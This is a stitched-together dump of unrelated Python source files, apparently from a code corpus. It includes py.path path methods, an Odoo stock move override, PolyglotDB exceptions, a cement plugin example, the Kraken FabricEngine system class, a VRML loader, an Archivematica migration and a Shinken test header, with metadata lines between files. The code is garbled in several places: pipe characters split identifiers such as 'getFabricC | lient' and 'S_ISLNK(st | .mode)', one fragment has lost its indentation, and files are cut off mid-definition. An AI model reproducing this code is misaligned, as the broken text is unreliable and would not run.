def link(self):
st = self.path.lstat()
return S_ISLNK(st | .mode)
    def __init__(self, path=None, expanduser=False):
        """ Initialize and return a local Path instance.
        Path can be relative to the current directory.
        If path is None it defaults to the current working directory.
        If expanduser is True, tilde-expansion is performed.
        Note that Path instances always carry an absolute path.
        Note also that passing in a local path object will simply return
        the exact same path object. Use new() to get a new copy.
        """
        if path is None:
            self.strpath = py.error.checked_call(os.getcwd)
        else:
            try:
                # Accept anything implementing the fspath protocol.
                path = fspath(path)
            except TypeError:
                raise ValueError("can only pass None, Path instances "
                                 "or non-empty strings to LocalPath")
            if expanduser:
                path = os.path.expanduser(path)
            # Always store a normalized absolute path.
            self.strpath = abspath(path)
    def __hash__(self):
        # Hash on the string path so equal paths collide in dicts/sets.
        # NOTE(review): __eq__ lowercases on win32 but __hash__ does not,
        # so hash/eq are inconsistent for differently-cased equal paths
        # on Windows -- confirm whether this is intentional.
        return hash(self.strpath)

    def __eq__(self, other):
        s1 = fspath(self)
        try:
            s2 = fspath(other)
        except TypeError:
            # Not path-like: never equal.
            return False
        if iswin32:
            # Windows paths compare case-insensitively.
            s1 = s1.lower()
            try:
                s2 = s2.lower()
            except AttributeError:
                return False
        return s1 == s2

    def __ne__(self, other):
        return not (self == other)

    def __lt__(self, other):
        return fspath(self) < fspath(other)

    def __gt__(self, other):
        return fspath(self) > fspath(other)

    def samefile(self, other):
        """ return True if 'other' references the same file as 'self'.
        """
        other = fspath(other)
        if not isabs(other):
            other = abspath(other)
        if self == other:
            return True
        if iswin32:
            return False  # there is no samefile
        return py.error.checked_call(
            os.path.samefile, self.strpath, other)
    def remove(self, rec=1, ignore_errors=False):
        """ remove a file or directory (or a directory tree if rec=1).
        if ignore_errors is True, errors while removing directories will
        be ignored.
        """
        if self.check(dir=1, link=0):
            if rec:
                # force remove of readonly files on windows
                if iswin32:
                    self.chmod(448, rec=1)  # octal 0700
                py.error.checked_call(py.std.shutil.rmtree, self.strpath,
                    ignore_errors=ignore_errors)
            else:
                # Non-recursive: only succeeds on an empty directory.
                py.error.checked_call(os.rmdir, self.strpath)
        else:
            # A file or a symlink (links are removed, not followed).
            if iswin32:
                self.chmod(448)  # octal 0700
            py.error.checked_call(os.remove, self.strpath)
def computehash(self, hashtype="md5", chunksize=524288):
""" return hexdigest of hashvalue for this file. """
try:
try:
import hashlib as mod
except ImportError:
if hashtype == "sha1":
hashtype = "sha"
mod = __import__(hashtype)
hash = getattr(mod, hashtype)()
except (AttributeError, ImportError):
raise ValueError("Don't know how to compute %r hash" %(hashtype,))
f = self.open('rb')
try:
while 1:
buf = f.read(chunksize)
if not buf:
return hash.hexdigest()
hash.update(buf)
finally:
f.close()
def new(self, **kw):
""" create a modified version of this path.
the following keyword arguments modify various path parts::
a:/some/path/to/a/file.ext
xx drive
xxxxxxxxxxxxxxxxx dirname
xxxxxxxx basename
xxxx purebasename
xxx ext
"""
obj = object.__new__(self.__class__)
|
ingadhoc/stock | stock_request_ux/models/stock_move.py | Python | agpl-3.0 | 1,308 | 0.000765 | ##############################################################################
# For copyright and license notices, see __manifest__.py file in module root
# directory
##############################################################################
from odoo import models, fields
class StockMove(models.Model):
    _inherit = 'stock.move'

    # Convenience link to the stock.request order behind this move,
    # reached through the related stock request lines.
    request_order_id = fields.Many2one(
        related='stock_request_ids.order_id',
    )

    def _split(self, qty, restrict_partner_id=False):
        """ When we are on a move created by a stock_request and we create a
        backorder, we create a new allocation linked to this new move and
        update quantities
        """
        new_move_id = super()._split(qty, restrict_partner_id=restrict_partner_id)
        # Re-distribute pending allocations between the original move and
        # the freshly split one, transferring at most ``qty`` units.
        remaining_to_allocate = qty
        for allocation in self.allocation_ids:
            if not remaining_to_allocate:
                break
            to_allocate = min(
                remaining_to_allocate, allocation.requested_product_uom_qty)
            remaining_to_allocate -= to_allocate
            # Clone the allocation onto the new move for the moved share...
            allocation.copy({
                'stock_move_id': new_move_id,
                'requested_product_uom_qty': to_allocate,
            })
            # ...and shrink the original allocation by the same amount.
            allocation.requested_product_uom_qty -= to_allocate
        return new_move_id
|
MontrealCorpusTools/PolyglotDB | polyglotdb/exceptions.py | Python | mit | 6,861 | 0.002186 |
# Base exception classes
class PGError(Exception):
    """
    Base class for all exceptions explicitly raised in PolyglotDB.
    """

    def __init__(self, value):
        # Human-readable message carried by every PolyglotDB error.
        self.value = value

    def __repr__(self):
        # e.g. "PGError: something broke" (uses the concrete subclass name)
        return '%s: %s' % (type(self).__name__, self.value)

    def __str__(self):
        return self.value
# Context Manager exceptions
class PGContextError(PGError):
    """
    Exception class for when context managers should be used and aren't.
    """
    pass
# Corpus loading exceptions
class ParseError(PGError):
    """
    Exception class for parsing errors; base class for the corpus-format
    specific parse errors below.
    """
    pass
class PGOSError(PGError):
    """
    Exception class for when files or directories that are expected are missing.
    Wrapper for OSError.
    """
    pass
class CorpusIntegrityError(PGError):
    """
    Exception for when a problem arises while loading in the corpus.
    """
    pass
class DelimiterError(PGError):
    """
    Exception for mismatch between specified delimiter and the actual text
    when loading in CSV files and transcriptions.
    """
    pass
class ILGError(ParseError):
    """
    Exception for general issues when loading interlinear gloss files.
    """
    pass
class ILGWordMismatchError(ParseError):
    """
    Exception for when interlinear gloss files have different numbers of
    words across lines that should have a one-to-one mapping.

    Parameters
    ----------
    mismatching_lines : list
        List of ``(line_range, line_dict)`` tuples, where ``line_range`` is
        a pair of line numbers and ``line_dict`` maps each line type to the
        list of words found on it
    """

    def __init__(self, mismatching_lines):
        self.main = "There doesn't appear to be equal numbers of words in one or more of the glosses."

        self.information = ''
        self.details = 'The following glosses did not have matching numbers of words:\n\n'
        for ml in mismatching_lines:
            line_inds, line = ml
            self.details += 'From lines {} to {}:\n'.format(*line_inds)
            for k, v in line.items():
                self.details += '({}, {} words) '.format(k, len(v))
                self.details += ' '.join(str(x) for x in v) + '\n'
        # PGError.__str__ returns self.value; without setting it here,
        # printing this exception raised AttributeError. Mirrors the
        # pattern used by BuckeyeParseError.
        self.value = '\n'.join([self.main, self.details])
class ILGLinesMismatchError(ParseError):
    """
    Exception for when the number of lines in a interlinear gloss file
    is not a multiple of the number of types of lines.

    Parameters
    ----------
    lines : list
        List of the lines in the interlinear gloss file
    """

    def __init__(self, lines):
        self.main = "There doesn't appear to be equal numbers of orthography and transcription lines"

        self.information = ''
        self.details = 'The following is the contents of the file after initial preprocessing:\n\n'
        for line in lines:
            if isinstance(line, tuple):
                self.details += '{}: {}\n'.format(*line)
            else:
                self.details += str(line) + '\n'
        # PGError.__str__ returns self.value; without setting it here,
        # printing this exception raised AttributeError. Mirrors the
        # pattern used by BuckeyeParseError.
        self.value = '\n'.join([self.main, self.details])
class TextGridError(ParseError):
    """
    Exception class for parsing TextGrids
    """
    pass
class TextGridTierError(TextGridError):
    """
    Exception for when a specified tier was not found in a TextGrid.

    Parameters
    ----------
    tier_type : str
        The type of tier looked for (such as spelling or transcription)
    tier_name : str
        The name of the tier specified
    tiers : list
        List of tiers in the TextGrid that were inspected
    """

    def __init__(self, tier_type, tier_name, tiers):
        self.main = 'The {} tier name was not found'.format(tier_type)
        self.information = 'The tier name \'{}\' was not found in any tiers'.format(tier_name)
        self.details = 'The tier name looked for (ignoring case) was \'{}\'.\n'.format(tier_name)
        self.details += 'The following tiers were found:\n\n'
        for t in tiers:
            self.details += '{}\n'.format(t.name)
        # PGError.__str__ returns self.value; without setting it here,
        # printing this exception raised AttributeError. Mirrors the
        # pattern used by BuckeyeParseError.
        self.value = '\n'.join([self.main, self.details])
class BuckeyeParseError(ParseError):
    """
    Exception class for parsing Buckeye formatted files.

    Parameters
    ----------
    path : str
        Path of the file that failed to parse
    misparsed_lines : list
        The lines that did not have enough fields
    """
    def __init__(self, path, misparsed_lines):
        if len(misparsed_lines) == 1:
            self.main = 'One line in \'{}\' was not parsed correctly.'.format(path)
        else:
            self.main = '{} lines in \'{}\' were not parsed correctly.'.format(len(misparsed_lines), path)
        self.information = 'The lines did not have enough fields to be parsed correctly.'
        self.details = 'The following lines were missing entries:\n\n'
        for t in misparsed_lines:
            self.details += '{}\n'.format(t)
        # self.value feeds PGError.__str__.
        self.value = '\n'.join([self.main, self.details])
# Acoustic exceptions
class AcousticError(PGError):
    """
    Exception class for errors in acoustic processing
    """
    pass
class NoSoundFileError(AcousticError):
    """
    Exception class for when no sound file exists
    """
    pass
class GraphQueryError(PGError):
    """
    Exception class for errors in querying the Neo4j database
    """
    pass
class CorpusConfigError(PGError):
    """
    Exception class for misconfigured CorpusContext objects
    """
    pass
class SubannotationError(PGError):
    """
    Exception class for subannotations
    """
    pass
class GraphModelError(PGError):
    """
    Exception class for generating Python objects from Neo4j queries
    """
    pass
class ConnectionError(PGError):
    """
    Exception class for connection failures.

    NOTE(review): this shadows the builtin ``ConnectionError`` (Python 3.3+)
    within this module; code catching ``ConnectionError`` after a star-import
    gets this class rather than the builtin -- confirm this is intended.
    """
    pass
class AuthorizationError(PGError):
    """
    Exception class for authentication failures
    """
    pass
class NetworkAddressError(PGError):
    """
    Exception class for malformed network addresses
    """
    pass
class TemporaryConnectionError(PGError):
    """
    Exception class for transient connection errors
    """
    # Repaired: the base-class reference in the class statement was garbled
    # by an extraction artifact; PGError matches every sibling class here.
    pass
class SubsetError(PGError):
    """
    Exception class for not finding a specified subset
    """
    pass
class HierarchyError(PGError):
    """
    Exception class for Hierarchy errors
    """
    pass
class ClientError(PGError):
    """
    Exception class for connecting to remote/local ISCAN servers
    """
    pass
class NodeAttributeError(GraphQueryError):
    """
    Exception class for errors in attributes for base nodes in constructing queries
    """
    pass
class SpeakerAttributeError(NodeAttributeError):
    """
    Exception class for errors in attributes for speakers in constructing queries
    """
    pass
class DiscourseAttributeError(NodeAttributeError):
    """
    Exception class for errors in attributes for discourses in constructing queries
    """
    pass
class AnnotationAttributeError(NodeAttributeError):
    """
    Exception class for errors in attributes for annotations in constructing queries
    """
    pass
class LexiconAttributeError(NodeAttributeError):
    """
    Exception class for errors in attributes for type annotations in constructing queries
    """
    pass
|
stupidnetizen/redflare | redflare/plugins/example/example.py | Python | gpl-3.0 | 5,659 | 0.014667 | """This is an example plugin for redflare."""
"""
This is a simple plugin to add some basic functionality.
"""
import sys, os
from pkg_resources import get_distribution
import logging
from cement import namespaces
from cement.core.log import get_logger
from cement.core.opt import init_parser
from cement.core.hook import define_hook, register_hook
from cement.core.command import CementCommand, register_command
from cement.core.plugin import CementPlugin, register_plugin
log = get_logger(__name__)
VERSION = '0.1'
REQUIRED_CEMENT_ABI = '20091211'
# Optional: Allows you to customize the output of --version
BANNER = """
redflare.plugins.example v%s
""" % (VERSION)
@register_plugin()
class ExamplePlugin(CementPlugin):
    """Example plugin showing how to declare config options and cli options.

    Note: two corrupted tokens in the constructor call (``version`` keyword
    and the description string) were repaired from extraction artifacts.
    """
    def __init__(self):
        CementPlugin.__init__(self,
            label = 'example',
            version = VERSION,
            description = 'Example plugin for redflare',
            required_abi = REQUIRED_CEMENT_ABI,
            version_banner=BANNER,
            )

        # plugin configurations can be setup this way
        self.config['example_option'] = False

        # plugin cli options can be setup this way. Generally, cli options
        # are used to set config options... so you probably want to
        # add your options to both.
        self.options.add_option('-E', '--example', action='store',
            dest='example_option', default=None, help='Example Plugin Option'
            )
@register_hook()
def options_hook(*args, **kwargs):
    """
    Use this hook to add options to other namespaces. An OptParse object is
    expected on return, and any options will be merged into the global options.
    Global options can also be used as local options by setting the config
    option 'merge_global_options = true' in the plugin config.
    """
    global_options = init_parser()
    global_options.add_option('-G', '--global-option', action ='store_true',
        dest='global_option', default=None, help='Example Global option'
        )

    # return the namespace and the global options to add.
    return ('global', global_options)
@register_hook()
def options_hook(*args, **kwargs):
    """
    We can also use the options hook to tie into other plugins, or even our
    own. This is an alternate way of adding options for your [or other]
    plugins.

    NOTE(review): this intentionally re-uses the name options_hook above --
    the decorator registers each function object at definition time, so both
    hooks run, although the second definition shadows the first name.
    """
    my_options = init_parser()
    my_options.add_option('--new-local', action ='store',
        dest='newlocal_option', default=None, help='Example Local option'
        )

    # return the namespace and the local options to add.
    return ('example', my_options)
@register_hook()
def post_options_hook(*args, **kwargs):
"""
Use this hook if any operations need to be performed if a global
option is passed. Notice that we set a global option of -G in our
global_options_hook above. Here we can access that value from the
global namespace configuration.
"""
cnf = namespaces['global'].config
if cnf.has_key('global_option'):
print "global_option => %s", cnf['global_option']
# then do something with it
@register_command(name='ex1', namespace='example')
class ex1Command(CementCommand):
    """
    This is how to add a local/plugin subcommand because it will be
    under the 'example' namespace. You would access this subcommand as:

        $ myapp example ex1
    """
    def run(self):
        # Invoked when the subcommand is executed on the command line.
        print "This is Example1Command.run()"

    def help(self):
        # Invoked via the hidden -help option of every command.
        print "This is Example1Command.help()"
@register_command(name='ex2', namespace='global')
class ex2Command(CementCommand):
    def run(self):
        """
        This is an example global command. See --help. When commands are
        called, they are passed the cli options and args passed after it.
        These are then forwarded onto the command class where they can be
        called as self.cli_args, and self.cli_opts.

        Notice that you can specify the namespace via the decorator parameters.
        If a plugin has any non-global commands they are grouped under a
        single command to the base cli application. For example, you will
        see global commands and namespaces* when you execute:

            myapp --help

        For example, if 'myplugin' has local commands, you will
        see 'myplugin*' show up in the global commands list, and then the
        plugin subcommands will be seen under:

            myapp myplugin --help

        This is done to give different options in how your application works.
        """
        print "This is Example2Command.run()."

        # you can then see if options where passed:
        if self.cli_opts.global_option:
            print "You passed --global-options!"

    def help(self):
        """
        All commands have a hidden -help option as well. Here you can
        provide examples or other helpful information.
        """
        print "This is Example2Command.help()"
@register_command(name='ex3', namespace='redflare_core')
class ex3Command(CementCommand):
    """
    This is how to add a local/plugin subcommand to another namespace. It
    is possible to use this in conjunction with the options_hook() to add
    additional functionality to a completely other namespace:

        $ myapp redflare ex3
    """
    def run(self):
        print "This is Example3Command.run()"

    def help(self):
        print "This is Example3Command.help()"
|
oculusstorystudio/kraken | Python/kraken/core/kraken_system.py | Python | bsd-3-clause | 13,241 | 0.002643 | """KrakenSystem - objects.kraken_core module.
Classes:
KrakenSystem - Class for constructing the Fabric Engine Core client.
"""
import logging
import os
import sys
import json
import importlib
from collections import OrderedDict
import FabricEngine.Core
# import kraken
from kraken.core.profiler import Profiler
from kraken.plugins import getFabricC | lient
from kraken.log import getLogger
from kraken.log.utils import fabricCallback
logger = getLogger('kraken')
class KrakenSystem(object):
"""The KrakenSystem is a singleton object used to provide an interface with
the FabricEngine Core and RTVal system."""
__instance = None
def __init__(s | elf):
"""Initializes the Kraken System object."""
super(KrakenSystem, self).__init__()
self.client = None
self.typeDescs = None
self.registeredTypes = None
self.loadedExtensions = []
self.registeredConfigs = OrderedDict()
self.registeredComponents = OrderedDict()
# self.moduleImportManager = ModuleImportManager()
    def loadCoreClient(self):
        """Loads the Fabric Engine Core Client (no-op if already loaded)."""

        if self.client is None:
            Profiler.getInstance().push("loadCoreClient")

            # Prefer a client supplied by the host application plugin;
            # otherwise create a standalone guarded client.
            client = getFabricClient()
            if client is None:
                options = {
                    'reportCallback': fabricCallback,
                    'guarded': True
                }
                client = FabricEngine.Core.createClient(options)

            self.client = client

            # Base extensions every Kraken session relies on.
            self.loadExtension('Math')
            self.loadExtension('Kraken')
            self.loadExtension('KrakenForCanvas')

            Profiler.getInstance().pop()
    def getCoreClient(self):
        """Returns the Fabric Engine Core Client owned by the KrakenSystem

        Returns:
            object: The Fabric Engine Core Client

        """

        # Lazily create the client on first access.
        if self.client is None:
            self.loadCoreClient()

        return self.client
    def loadExtension(self, extension):
        """Loads the given extension and updates the registeredTypes cache.

        Args:
            extension (str): The name of the extension to load.

        """

        if extension not in self.loadedExtensions:
            Profiler.getInstance().push("loadExtension:" + extension)

            self.client.loadExtension(extension)

            # Refresh the RT type caches after the extension registers types.
            self.registeredTypes = self.client.RT.types
            self.typeDescs = self.client.RT.getRegisteredTypes()
            # Cache the loaded extension so that we avoid refreshing the typeDescs cache (costly)
            self.loadedExtensions.append(extension)

            Profiler.getInstance().pop()
# ==============
# RTVal Methods
# ==============
    def convertFromRTVal(self, target, RTTypeName=None):
        """Generates an RTVal object based on the simple type of target
        and passes target to constructor. Converts a property of an RTVal
        object to its own Python RTVal object.

        Args:
            target (RTVal): The RTVal object or property to cast
            RTTypeName (str): The type of RTVal to convert to; if None it is
                queried from the target itself.

        Returns:
            RTVal: The RTVal object

        """

        self.loadCoreClient()

        if RTTypeName is None:
            # Ask the KL side for the simple type name of the target.
            RTTypeName = target.type('String').getSimpleType()

        rtValType = getattr(self.client.RT.types, RTTypeName)
        pythonRTVal = rtValType(target)

        return pythonRTVal
    def constructRTVal(self, dataType, defaultValue=None):
        """Constructs a new RTVal using the given name and optional default value.

        Args:
            dataType (str): The name of the data type to construct.
            defaultValue (value): The default value to use to initialize the RTVal

        Returns:
            object: The constructed RTval.

        """

        self.loadCoreClient()
        klType = getattr(self.registeredTypes, dataType)

        if defaultValue is not None:
            # Values that are already wrapped carry their RTVal in _rtval.
            if hasattr(defaultValue, '_rtval'):
                return defaultValue._rtval

            typeDesc = self.typeDescs[dataType]

            if 'members' in typeDesc:
                # Struct-like type: create it, then copy matching members
                # over from the default value, recursing per member type.
                try:
                    value = klType.create()
                except:
                    # NOTE(review): bare except hides the create() failure;
                    # only the fallback constructor's failure is surfaced.
                    try:
                        return klType()
                    except Exception as e:
                        raise Exception("Error constructing RTVal:" + dataType)

                for i in xrange(0, len(typeDesc['members'])):  # Python 2 (xrange)
                    memberName = typeDesc['members'][i]['name']
                    memberType = typeDesc['members'][i]['type']

                    # NOTE(review): membership is tested with `in` but the
                    # value is read with getattr -- defaultValue must support
                    # both __contains__ and attribute access; confirm.
                    if memberName in defaultValue:
                        setattr(value, memberName, self.constructRTVal(memberType, getattr(defaultValue, memberName)))

                return value
            else:
                # Scalar-like type: pass the default straight to the ctor.
                return klType(defaultValue)
        else:
            # No default: try the KL create() factory, then the plain ctor.
            try:
                return klType.create()
            except:
                try:
                    return klType()
                except Exception as e:
                    raise Exception("Error constructing RTVal:" + dataType)
    def rtVal(self, dataType, defaultValue=None):
        """Constructs a new RTVal using the given name and optional default value.

        Thin convenience wrapper around constructRTVal.

        Args:
            dataType (str): The name of the data type to construct.
            defaultValue (value): The default value to use to initialize the RTVal

        Returns:
            object: The constructed RTval.

        """

        return self.constructRTVal(dataType, defaultValue)
def isRTVal(self, value):
"""Returns true if the given value is an RTVal.
Args:
value (value): value to test.
Returns:
bool: True if successful.
"""
return str(type(value)) == "<type 'PyRTValObject'>"
    def getRTValTypeName(self, rtval):
        """Returns the name of the type, handling extracting the name from KL RTVals.

        Args:
            rtval (rtval): The rtval to extract the name from.

        Returns:
            str: The RT type name, or the literal string "None" when the
                input is not an RTVal.

        """

        if ks.isRTVal(rtval):
            # Round-trip through the JSON description to obtain the name.
            return json.loads(rtval.type("Type").jsonDesc("String").getSimpleType())['name']
        else:
            return "None"
# ==================
# Config Methods
# ==================
def registerConfig(self, configClass):
"""Registers a config Python class with the KrakenSystem so ti can be built by the rig builder.
Args:
configClass (str): The Python class of the config
"""
configModulePath = configClass.__module__ + "." + configClass.__name__
self.registeredConfigs[configModulePath] = configClass
def getConfigClass(self, className):
"""Returns the registered Python config class with the given name
Args:
className (str): The name of the Python config class
Returns:
object: The Python config class
"""
if className not in self.registeredConfigs:
raise Exception("Config with that class not registered:" + className)
return self.registeredConfigs[className]
    def getConfigClassNames(self):
        """Returns the names of the registered Python config classes

        Returns:
            list: The array of config class names.

        """

        return self.registeredConfigs.keys()
# ==================
# Component Methods
# ==================
    def registerComponent(self, componentClass):
        """Registers a component Python class with the KrakenSystem so it can be built by the rig builder.

        Args:
            componentClass (str): The Python class of the component

        """

        componentClassPath = componentClass.__module__ + "." + componentClass.__name__
        if componentClassPath in self.registeredComponents:
            # we allow reregistering of components because as a component's class is edited
            # it will be re-imported by python (in Maya), and the classes reregistered.
            pass

        self.registeredComponents[componentClassPath] = componentClass
def g |
jlisee/xpkg | python/xpkg/paths.py | Python | bsd-3-clause | 381 | 0 | # Author: Joseph Lisee <jlisee@gmail.com>
__doc__ = """
Functions to return common xpkg paths.
"""
# Python Imports
import os
def ld_linux_path(root):
    """
    Returns the path to our major ld-so symlink. (Which allows us to change
    which ld-so we are actively using without patching a bunch of binaries)
    """
    parts = (root, 'lib', 'ld-linux-xpkg.so')
    return os.path.join(*parts)
|
plotly/python-api | packages/python/plotly/plotly/validators/isosurface/caps/_x.py | Python | mit | 1,178 | 0.000849 | import _plotly_utils.basevalidators
class XValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="x", parent_name="isosurface.caps", **kwargs):
super(XValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "X"),
data_docs=kwargs.pop(
"data_docs",
"""
fill
Sets the fill ratio of the `ca | ps`. The default
fill value of the `caps` is 1 meaning that they
are entirely shaded. On the other hand Applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill r | atio of the `slices`. The
default fill value of the x `slices` is 1
meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
""",
),
**kwargs
)
|
timvandermeij/mobile-radio-tomography | environment/VRML_Loader.py | Python | gpl-3.0 | 4,378 | 0.001827 | import os
import numpy as np
from vrml.vrml97 import basenodes, nodetypes, parser, parseprocessor
class VRML_Loader(object):
    """
    Parser for VRML files. The VRML language is described in its specification
    at http://www.web3d.org/documents/specifications/14772/V2.0/index.html
    """

    def __init__(self, environment, filename, translation=None, transform=None):
        # environment: provides get_location() for coordinate conversion.
        # translation: optional (north, east, alt) offset added to all points.
        # transform: optional affine matrix applied to all points.
        self.environment = environment
        self.filename = filename
        if translation is None:
            translation = (0.0, 0.0, 0.0)
        elif len(translation) != 3:
            raise ValueError("Translation must be a 3-component offset")

        self.translation = tuple(translation)
        self._transform = transform

        # Parse the file eagerly; the objects are extracted lazily.
        vrml_parser = parser.Parser(parser.grammar, "vrmlFile")
        processor = parseprocessor.ParseProcessor(baseURI=self.filename)
        with open(self.filename, 'r') as f:
            data = f.read()

        self._scene = vrml_parser.parse(data, processor=processor)[1][1]
        self._objects = None

    def get_objects(self):
        """
        Retrieve the objects from the VRML scene file.

        The objects are provided as a list of lists of lists, where the deepest
        nested lists are faces describing a polygon using point locations. Each
        element of the list can therefore have multiple faces.
        """
        if self._objects is None:
            # Cache the result: walking the scene graph is expensive.
            self._objects = []
            self._parse_children(self._scene, self._transform)

        return self._objects

    def _parse_children(self, group, transform=None):
        # Recursively walk the scene graph, accumulating shape geometry into
        # self._objects while composing nested transforms along the way.
        for child in group.children:
            if isinstance(child, basenodes.Inline):
                # Include the objects from the referenced file into the scene.
                path = os.path.join(os.path.dirname(self.filename),
                                    child.url[0])
                loader = VRML_Loader(self.environment, path,
                                     translation=self.translation,
                                     transform=transform)
                self._objects.extend(loader.get_objects())
            elif isinstance(child, basenodes.Transform):
                # Jumble up transformation matrices, in case they are nested.
                forward = child.localMatrices().data[0]
                if forward is not None:
                    if transform is not None:
                        new_transform = np.dot(transform, forward)
                    else:
                        new_transform = forward
                else:
                    new_transform = transform

                self._parse_children(child, new_transform)
            elif isinstance(child, nodetypes.Grouping):
                # Retrieve children from grouped nodes.
                self._parse_children(child, transform)
            elif isinstance(child, basenodes.Shape):
                # Parse the coordinates from a shape's geometry.
                self._parse_geometry(child.geometry, transform)

    def _parse_geometry(self, geometry, transform=None):
        # Convert one indexed face set into faces of environment locations.
        faces = []
        face = []
        for i in geometry.coordIndex:
            if i == -1:
                # An index of -1 terminates the current face in VRML.
                faces.append(face)
                face = []
            else:
                point = geometry.coord.point[i]
                if transform is not None:
                    # The translation matrices from the VRML library are for
                    # affine translations, but they are transposed for some
                    # reason. See vrml.vrml97.transformmatrix, e.g. line 319.
                    point = np.dot(transform.T, np.append(point, 1).T)

                # Convert to Location
                # VRML geometry notation is in (x,z,y) where y is the vertical
                # axis (using GL notation here). We have to convert it to
                # (z,x,y) since the z/x are related to distances on the ground
                # in north and east directions, respectively, and y is still
                # the altitude.
                north = point[1] + self.translation[0]
                east = point[0] - self.translation[1]
                alt = point[2] + self.translation[2]
                loc = self.environment.get_location(north, east, alt)
                face.append(loc)

        # Append the trailing face if the list did not end with -1.
        if len(face) > 0:
            faces.append(face)

        self._objects.append(faces)
|
sevein/archivematica | src/dashboard/src/main/migrations/0007_django_upgrade_tweaks.py | Python | agpl-3.0 | 4,909 | 0.003056 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Field-definition tweaks accompanying the Django upgrade.

    Re-asserts help_text / verbose_name / db_column / related_name options so
    the migration state matches the models. Two extraction-garbled literals
    (the agent identifiervalue help_text and one ``preserve_default=True``)
    were repaired.
    """

    dependencies = [
        ('main', '0006_levelofdescription'),
    ]

    operations = [
        migrations.AlterField(
            model_name='agent',
            name='identifiertype',
            field=models.TextField(null=True, verbose_name=b'Agent Identifier Type', db_column=b'agentIdentifierType'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='agent',
            name='identifiervalue',
            field=models.TextField(help_text=b'Used for premis:agentIdentifierValue and premis:linkingAgentIdentifierValue in the METS file.', null=True, verbose_name=b'Agent Identifier Value', db_column=b'agentIdentifierValue'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='agent',
            name='name',
            field=models.TextField(help_text=b'Used for premis:agentName in the METS file.', null=True, verbose_name=b'Agent Name', db_column=b'agentName'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='microservicechainlink',
            name='defaultnextchainlink',
            field=models.ForeignKey(db_column=b'defaultNextChainLink', blank=True, to='main.MicroServiceChainLink', null=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='microservicechainlink',
            name='replaces',
            field=models.ForeignKey(related_name='replaced_by', db_column=b'replaces', blank=True, to='main.MicroServiceChainLink', null=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='microservicechoicereplacementdic',
            name='lastmodified',
            field=models.DateTimeField(auto_now=True, db_column=b'lastModified'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='rightsstatementcopyright',
            name='copyrightenddateopen',
            field=models.BooleanField(default=False, help_text=b'Indicate end date is open', verbose_name=b'Open End Date', db_column=b'copyrightApplicableEndDateOpen'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='rightsstatementlicense',
            name='licenseenddateopen',
            field=models.BooleanField(default=False, help_text=b'Indicate end date is open', verbose_name=b'Open End Date', db_column=b'licenseApplicableEndDateOpen'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='rightsstatementotherrightsinformation',
            name='otherrightsenddateopen',
            field=models.BooleanField(default=False, help_text=b'Indicate end date is open', verbose_name=b'Open End Date', db_column=b'otherRightsApplicableEndDateOpen'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='rightsstatementrightsgranted',
            name='enddateopen',
            field=models.BooleanField(default=False, help_text=b'Indicate end date is open', verbose_name=b'Open End Date', db_column=b'endDateOpen'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='rightsstatementstatuteinformation',
            name='statuteenddateopen',
            field=models.BooleanField(default=False, help_text=b'Indicate end date is open', verbose_name=b'Open End Date', db_column=b'statuteApplicableEndDateOpen'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='dublincore',
            name='date',
            field=models.TextField(help_text=b'Use ISO 8601 (YYYY-MM-DD or YYYY-MM-DD/YYYY-MM-DD)', db_column=b'date', blank=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='microservicechain',
            name='replaces',
            field=models.ForeignKey(related_name='replaced_by', db_column=b'replaces', blank=True, to='main.MicroServiceChain', null=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='rightsstatementrightsgrantednote',
            name='rightsgranted',
            field=models.ForeignKey(related_name='notes', db_column=b'fkRightsStatementRightsGranted', to='main.RightsStatementRightsGranted'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='rightsstatementrightsgrantedrestriction',
            name='rightsgranted',
            field=models.ForeignKey(related_name='restrictions', db_column=b'fkRightsStatementRightsGranted', to='main.RightsStatementRightsGranted'),
            preserve_default=True,
        ),
    ]
|
h4wkmoon/shinken | test/shinken_test.py | Python | agpl-3.0 | 14,045 | 0.002563 | #!/usr/bin/env python
#
# This file is used to test host- and service-downtimes.
#
import sys
import time
import datetime
import os
import string
import re
import random
import unittest
import copy
# import the shinken library from the parent directory
import __import_shinken ; del __import_shinken
import shinken
from shinken.objects.config import Config
from shinken.objects.command import Command
from shinken.objects.module import Module
from shinken.dispatcher import Dispatcher
from shinken.log import logger
from shinken.modulesctx import modulesctx
from shinken.scheduler import Scheduler
from shinken.macroresolver import MacroResolver
from shinken.external_command import ExternalCommandManager, ExternalCommand
from shinken.check import Check
from shinken.message import Message
from shinken.arbiterlink import ArbiterLink
from shinken.schedulerlink import SchedulerLink
from shinken.pollerlink import PollerLink
from shinken.reactionnerlink import ReactionnerLink
from shinken.brokerlink import BrokerLink
from shinken.satellitelink import SatelliteLink
from shinken.notification import Notification
from shinken.modulesmanager import ModulesManager
from shinken.basemodule import BaseModule
from shinken.brok import Brok
from shinken.daemons.schedulerdaemon import Shinken
from shinken.daemons.brokerdaemon import Broker
from shinken.daemons.arbiterdaemon import Arbiter
from shinken.daemons.receiverdaemon import Receiver
from logging import ERROR
# Modules are by default on the ../modules
myself = os.path.abspath(__file__)
global modules_dir
modules_dir = "modules"
def define_modules_dir(val):
    """Override the directory the test suite loads Shinken modules from."""
    global modules_dir
    modules_dir = val
class __DUMMY:
    """Minimal sink object handed to the logger; discards whatever it gets."""
    def add(self, obj):
        # Swallow anything the logger tries to queue.
        pass
